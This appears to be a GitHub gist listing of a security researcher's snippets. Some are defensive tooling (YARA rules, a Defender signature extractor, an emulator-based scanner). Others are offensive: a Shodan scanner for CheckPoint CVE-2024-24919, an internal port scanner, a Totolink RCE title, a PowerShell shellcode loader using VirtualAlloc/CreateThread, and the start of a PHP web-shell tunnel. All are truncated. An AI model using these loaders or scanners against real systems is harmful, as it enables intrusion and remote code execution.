Skip to content

Instantly share code, notes, and snippets.

@dmknght
dmknght / dangerous_methods.yara
Last active September 11, 2024 07:52
Yara rules to find dangerous functions and methods in various file format. This file is meant to help researchers find source sinks. It doesn't mean to find vulnerabilities automatically.
import "elf"
import "console"
/*
To use this rule, simply run: yara <path to this rule> <pah to dir to scan> -r -p 1 -N
Explain:
-r: recursively search
-p 1: Run single thread only. Show console log won't be messed up
-N: No follow symlink. Ignore duplicate results from symlink
Suggestion: In future, run with -s could be good
@dmknght
dmknght / CheckPoint_CVE-2024-24919_Shodan.py
Last active July 1, 2024 15:34
Scan for CheckPoint CVE-2024-24919 using Shodan
#!/usr/bin/python3
import os
import requests
from shodan import Shodan
API_KEY_PATH = os.path.expanduser("~/.config/shodan/api_key") # read API key from config file
KEYWORD = "country:cn http.status:200 \"Server: Check Point SVN foundation\""
URL_REQ = "/clients/MyCRL"
@dmknght
dmknght / scan_ports_with_bash.sh
Last active December 11, 2023 22:53
A port scanner in bash. No netcat / nmap is required. Might be useful when discover open ports in internal network on a Linux server.
#!/bin/bash
# Example of using bash with array
port_arr=(80 22 3306)
max_timeout=2 # Timeout requires coreutils (on Debian-based system)
function do_scan_port {
# If use array like above, use the line above
for port in "${port_arr[@]}"; do
# Otherwise, use the port range
@dmknght
dmknght / yr_find_creds.nim
Created November 19, 2023 04:34
Demo of using yara to find files that contains credentials. Requires Yara binding for Nim to compile.
import .. / src / engine / libyara # Binding lib co san. Neu tai ve thi sua cho nay, lay binding o day https://github.com/dmknght/nimyara
import strformat
import os
# Pass vao compiler de link voi thu vien Yara
{.passL: "-lyara".}
type
COMPILER_RESULT = object
errors: int
warnings: int
@dmknght
dmknght / WinDef_Extractor.cpp
Created October 30, 2023 23:05
Read, Extract, Merge extracted db of Windows Defender
/*
Forked from https://github.com/hongson11698/defender-database-extract/
- Fixed some buffer overflow in sprintf
- Compile: g++ extract_sig.cpp -o extract_sig -Wall -lstdc++fs
- Usage: ./extract_sig <dir to write result> <extracted av/as base> <optional: extracted av/as dlta>
If both av and dlta is defined, the program will merge both of them to make a final db
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
@dmknght
dmknght / qiling_to_dump.py
Last active November 2, 2023 09:59
Use qiling to execute file (rootfs is required). Support showing ASM code and save Dump file
from qiling import *
from qiling.const import *
from unicorn.x86_const import UC_X86_INS_SYSCALL # https://github.com/unicorn-engine/unicorn/blob/master/bindings/python/unicorn/x86_const.py
import argparse
import yara
def mem_scan(ql: Qiling, address: int, size: int, yr_pointer) -> None:
buf = ql.mem.read(address, size)
for insn in ql.arch.disassembler.disasm(buf, address):
@dmknght
dmknght / totolink_bypass_to_rce.md
Last active October 26, 2023 00:05
Use format string bypass Totolink's Validity_check function, lead to remote OS command injection (CVE-2023-4746)
$rzJEzfsIm = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
$ozmjNQUHYWcWLEB = Add-Type -memberDefinition $rzJEzfsIm -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $bwHCjeufl = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0
<?php
ini_set("allow_url_fopen", true);
ini_set("allow_url_include", true);
ini_set('always_populate_raw_post_data', -1);
error_reporting(E_ERROR | E_PARSE);
if(version_compare(PHP_VERSION,'5.4.0','>='))@http_response_code(200);
function blv_decode($data) {
$data_len = strlen($data);